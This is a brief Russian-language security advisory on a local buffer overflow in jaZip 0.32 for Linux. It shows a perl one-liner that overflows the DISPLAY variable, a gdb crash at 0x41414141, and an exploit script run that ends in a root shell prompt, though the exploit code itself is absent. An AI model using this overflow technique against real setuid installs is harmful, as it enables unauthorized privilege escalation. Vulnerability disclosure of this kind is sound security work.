jaZip — программа для управления Iomega Zip’ом и/или дисками Jaz и дисками под Linux. Уязвимость в программе позволяет локальным пользователям «заставить» программу выполнить произвольный программный код. Иногда программа установлена (хотя администратор, секущий фишку, никогда так не сделает) как setuid, что позволяет получение повышенных привилегий.

Системы уязвимы:
JaZip 0.32 (в том числе патченная до 2-го «уровня»)

Пример:
   # export DISPLAY=`perl -e ‘{print «A»x»2100»}’`
   # gdb /usr/X11R6/bin/jazip
  GNU gdb 19991004
  Copyright 1998 Free Software Foundation, Inc.
  (gdb) r
  Starting program: /usr/X11R6/bin/jazip
  Program received signal SIGSEGV, Segmentation fault.
  0x41414141 in ?? ()
  —-
   $ rpm -q jaZip
  jaZip-0.32-2
   $ ./jazip-exploit.pl
  Address: 0xbffff7ac
  bash#

Код эксплоита



Оставить мнение